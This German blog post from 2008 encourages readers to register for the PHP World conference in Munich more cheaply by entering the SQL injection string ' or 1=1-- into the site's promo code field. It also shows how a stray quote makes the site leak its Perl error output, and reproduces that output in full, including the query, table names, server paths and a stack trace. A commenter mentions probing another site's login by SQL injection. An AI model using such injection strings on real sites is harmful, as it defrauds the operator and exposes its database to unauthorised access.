Hannes  PreishuberPHP World Kongress. Viel Geld sparen mit SQL Injection


Die PHP World Konferenz findet in München statt. Kostet diese doch nenneswerte 490 Euro.

Wer sich Geld sparen möchte, kann sich zu diesem “Welt Event” dank SQL Injection auch billiger anmelden. Einfach im Promocode ‘ or 1=1— eingeben.

image

Wie man sieht kostet es dann nur noch 149,- Euro (ich werd mir sogar noch diese sparen). Das funktioniert weil damit der erste Promocode in der Tabelle gefunden wird.

image

Wer ein wenig in den Qeullcode schauen will kann das im Sinne von Open Source auch ganz einfach indem man in Code was SQL unsinnges eingibt zb ein ‘;

Da erhält man gleich alles was der Pearl Programmierer so braucht

Software error:

Fehler execute "
         select 
           c.*,
           s.termin_liste
         from 
           coupon       c,
           coupon_serie s
         where 
           key = '';' 
         and 
           c.serie = s.id
         and 
           status = 'AKTIV'
        "SELECT: FEHLER:  Fehler »Syntaxfehler« bei »' 
         and 
           c.serie = s.id
         and 
           status = '« at character 165

For help, please send mail to the webmaster (webmaster@dummy-host.example.com), giving this error message and the time and date of the error.

Software error:

[Tue Aug  5 10:43:47 2008] bestellung.pl: Fehler execute "
[Tue Aug  5 10:43:47 2008] bestellung.pl:          select 
[Tue Aug  5 10:43:47 2008] bestellung.pl:            c.*,
[Tue Aug  5 10:43:47 2008] bestellung.pl:            s.termin_liste
[Tue Aug  5 10:43:47 2008] bestellung.pl:          from 
[Tue Aug  5 10:43:47 2008] bestellung.pl:            coupon       c,
[Tue Aug  5 10:43:47 2008] bestellung.pl:            coupon_serie s
[Tue Aug  5 10:43:47 2008] bestellung.pl:          where 
[Tue Aug  5 10:43:47 2008] bestellung.pl:            key = '';' 
[Tue Aug  5 10:43:47 2008] bestellung.pl:          and 
[Tue Aug  5 10:43:47 2008] bestellung.pl:            c.serie = s.id
[Tue Aug  5 10:43:47 2008] bestellung.pl:          and 
[Tue Aug  5 10:43:47 2008] bestellung.pl:            status = 'AKTIV'
[Tue Aug  5 10:43:47 2008] bestellung.pl:         "SELECT: FEHLER:  Fehler »Syntaxfehler« bei »' 
[Tue Aug  5 10:43:47 2008] bestellung.pl:          and 
[Tue Aug  5 10:43:47 2008] bestellung.pl:            c.serie = s.id
[Tue Aug  5 10:43:47 2008] bestellung.pl:          and 
[Tue Aug  5 10:43:47 2008] bestellung.pl:            status = '« at character 165
 at /usr/lib/perl5/5.8.8/CGI/Carp.pm line 314
	CGI::Carp::realdie('[Tue Aug  5 10:43:47 2008] bestellung.pl: Fehler execute "\x{a}[T...') called at /usr/lib/perl5/5.8.8/CGI/Carp.pm line 400
	CGI::Carp::die('Fehler execute "\x{a}         select \x{a}           c.*,\x{a}           ...') called at PSMDbiPg.pm line 289
	DbiLibIT::meldung('Fehler execute "\x{a}         select \x{a}           c.*,\x{a}           ...') called at PSMDbiPg.pm line 215
	DbiLibIT::db_select_ref('DBI::db=HASH(0x893b714)', '\x{a}         select \x{a}           c.*,\x{a}           s.termin_liste\x{a} ...') called at PSMDbiPg.pm line 236
	DbiLibIT::db_select('DBI::db=HASH(0x893b714)', '\x{a}         select \x{a}           c.*,\x{a}           s.termin_liste\x{a} ...') called at /var/www/seminar.html/cgi-bin/bestellung.pl line 547
	main::bestellung_buchung_save('DBI::db=HASH(0x893b714)', 'HASH(0x89522e0)', 31196) called at /var/www/seminar.html/cgi-bin/bestellung.pl line 119

For help, please send mail to the webmaster (webmaster@dummy-host.example.com), giving



Kategorien: Konferenzen;SQL; 05.08.2008 11:14:17


 


Neuen Kommentar einfügen:

  Titel:   
  Name:
  E-Mail:
  Kommentar:

 
 


Kommentare


Thomas, am 05.08.2008 23:14:19

Hm?

Muss man das unbedingt veröffentlichen, wenn's um die direkte Konkurrenz geht? Ich weiß ja nicht. Ach ja, und: "Der Wert NULL kann in die 'Title'-Spalte, 'develnaut.dbo.BlogComments'-Tabelle nicht eingefügt werden. Die Spalte lässt NULL-Werte nicht zu. Fehler bei INSERT." Da versteht aber jemand sein Handwerk. *gähn*

Bernhard Grojer, am 05.08.2008 17:49:30

Peinlich

Und ich dachte soetwas gibts nur mehr bei 100 Jahre alten Seite die kein Mensch mehr benutzt. Eigentlich nur mehr peinlich die Sache ... PS: Hab vor etwa einem Jahr auf einer großen Modelseite beim Login auch erfolgreich auf SQL Injection getestet. (war auch eine PHP Site)



© Copyright 2008 ppedv AG